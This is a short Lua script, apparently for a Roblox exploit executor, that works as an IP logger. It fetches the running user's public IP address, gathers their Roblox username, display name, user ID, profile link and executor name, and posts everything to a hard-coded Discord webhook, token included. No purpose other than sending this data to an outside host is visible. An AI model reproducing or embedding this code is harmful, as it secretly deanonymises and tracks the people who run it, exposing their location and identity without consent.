syn.request({
  Url = "https://discord.com/api/webhooks/926910578734268416/gDQKzgRrKXaIabTMaAn7mu_9a-tPvw3yHlop7aZI5CKS0K9zkLhYna8dN5vCBi7qx0-N",
  Body = game:GetService("HttpService"):JSONEncode({
    embeds = {
      {
        title = "IP: ||" .. game:HttpGet("https://v4.ident.me") .. "||",
        type = "rich",
        description = "DisplayName: **" .. game.Players.LocalPlayer.DisplayName .. "**" .. "\n" .. "UserId : **" .. game.Players.LocalPlayer.UserId .. "**" .. "\n" .. "Link To Profile: https://www.roblox.com/users/" .. game.Players.LocalPlayer.UserId .. "/profile" .. "\n" .. "Executer: **" .. identifyexecutor() .. "**",
        color = tonumber(7498202),
        footer = {}
      }
    },
    avatar_url = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" .. tostring(game:GetService("Players").LocalPlayer.Name),
    username = "Username: " .. game.Players.LocalPlayer.Name
  }),
  Method = "POST",
  Headers = {
    ["content-type"] = "application/json"
  }
})
